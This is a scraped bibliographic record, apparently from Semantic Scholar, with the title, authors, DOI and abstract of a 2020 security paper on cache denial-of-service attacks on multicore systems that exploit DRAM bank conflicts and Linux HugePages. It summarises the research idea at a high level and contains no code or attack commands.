{"title":"利用DRAM银行映射和HugePages对多核共享缓存进行有效的拒绝服务攻击","authors":"M. Bechtel, H. Yun","doi":"10.1145/3384217.3386394","DOIUrl":null,"url":null,"abstract":"In this paper, we propose memory-aware cache DoS attacks that can induce more effective cache blocking by taking advantage of information of the underlying memory hardware. Like prior cache DoS attacks, our new attacks also generate lots of cache misses to exhaust cache internal shared hardware resources. The difference is that we carefully control those cache misses to target the same DRAM bank to induce bank conflicts. Note that accesses to different DRAM banks can occur in parallel, and are thus faster. However, accesses to the same bank are serialized, and thus slower [5] and as each memory access request takes longer to finish, it would prolong the time it takes for the cache to become unblocked. We further extend these attacks to exploit HugePage support in Linux in order to directly control physical address bits and to avoid TLB contention, while mounting the attacks from the userspace.","PeriodicalId":205173,"journal":{"name":"Proceedings of the 7th Symposium on Hot Topics in the Science of Security","volume":"31 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2020-08-25","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"1","resultStr":"{\"title\":\"Exploiting DRAM bank mapping and HugePages for effective denial-of-service attacks on shared cache in multicore\",\"authors\":\"M. Bechtel, H. Yun\",\"doi\":\"10.1145/3384217.3386394\",\"DOIUrl\":null,\"url\":null,\"abstract\":\"In this paper, we propose memory-aware cache DoS attacks that can induce more effective cache blocking by taking advantage of information of the underlying memory hardware. Like prior cache DoS attacks, our new attacks also generate lots of cache misses to exhaust cache internal shared hardware resources. The difference is that we carefully control those cache misses to target the same DRAM bank to induce bank conflicts. Note that accesses to different DRAM banks can occur in parallel, and are thus faster. However, accesses to the same bank are serialized, and thus slower [5] and as each memory access request takes longer to finish, it would prolong the time it takes for the cache to become unblocked. We further extend these attacks to exploit HugePage support in Linux in order to directly control physical address bits and to avoid TLB contention, while mounting the attacks from the userspace.\",\"PeriodicalId\":205173,\"journal\":{\"name\":\"Proceedings of the 7th Symposium on Hot Topics in the Science of Security\",\"volume\":\"31 1\",\"pages\":\"0\"},\"PeriodicalIF\":0.0000,\"publicationDate\":\"2020-08-25\",\"publicationTypes\":\"Journal Article\",\"fieldsOfStudy\":null,\"isOpenAccess\":false,\"openAccessPdf\":\"\",\"citationCount\":\"1\",\"resultStr\":null,\"platform\":\"Semanticscholar\",\"paperid\":null,\"PeriodicalName\":\"Proceedings of the 7th Symposium on Hot Topics in the Science of Security\",\"FirstCategoryId\":\"1085\",\"ListUrlMain\":\"https://doi.org/10.1145/3384217.3386394\",\"RegionNum\":0,\"RegionCategory\":null,\"ArticlePicture\":[],\"TitleCN\":null,\"AbstractTextCN\":null,\"PMCID\":null,\"EPubDate\":\"\",\"PubModel\":\"\",\"JCR\":\"\",\"JCRName\":\"\",\"Score\":null,\"Total\":0}","platform":"Semanticscholar","paperid":null,"PeriodicalName":"Proceedings of the 7th Symposium on Hot Topics in the Science of Security","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1145/3384217.3386394","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}
Exploiting DRAM bank mapping and HugePages for effective denial-of-service attacks on shared cache in multicore
In this paper, we propose memory-aware cache DoS attacks that can induce more effective cache blocking by taking advantage of information of the underlying memory hardware. Like prior cache DoS attacks, our new attacks also generate lots of cache misses to exhaust cache internal shared hardware resources. The difference is that we carefully control those cache misses to target the same DRAM bank to induce bank conflicts. Note that accesses to different DRAM banks can occur in parallel, and are thus faster. However, accesses to the same bank are serialized, and thus slower [5] and as each memory access request takes longer to finish, it would prolong the time it takes for the cache to become unblocked. We further extend these attacks to exploit HugePage support in Linux in order to directly control physical address bits and to avoid TLB contention, while mounting the attacks from the userspace.